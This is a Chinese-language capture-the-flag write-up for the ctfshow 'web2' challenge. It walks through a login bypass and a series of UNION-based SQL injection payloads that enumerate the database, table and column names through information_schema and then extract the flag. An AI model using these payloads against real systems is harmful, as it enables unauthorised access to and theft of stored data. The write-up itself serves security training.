ctfshow--web2 sql注入

这题是考sql注入，我们先用个万能语句注入

发现它上面会出现 欢迎你，ctfshow
那么这就很明显了，这个用户的名字就是ctfshow
那么猜测flag会不会是在flag的用户里面呢我们提交一下

如果有flag的用户的话他的 欢迎你，ctfshow 会变成 欢迎你，flag但是很明显没有

尝试这个语句
1' union select 1,2,3#
发现ctfshow变化了

那么接下来我们就可以直接获取数据库名称
1' union select 1,concat('--',(select database())),3# 是web2

接下来查web2下的表有哪些
1' union select 1,concat('--',(select table_name from information_schema.tables where table_schema='web2' limit 1),'--'),3#
发现有个flag表

那么我们进一步查看flag表有哪些字段
1' union select 1,concat('--',(select column_name from information_schema.columns where table_schema='web2' limit 1),'--'),3#
发现有个flag字段

接着查看flag字段的内容，就拿到flag了
1' union select 1,(select group_concat('--',flag,'--') from flag),3 #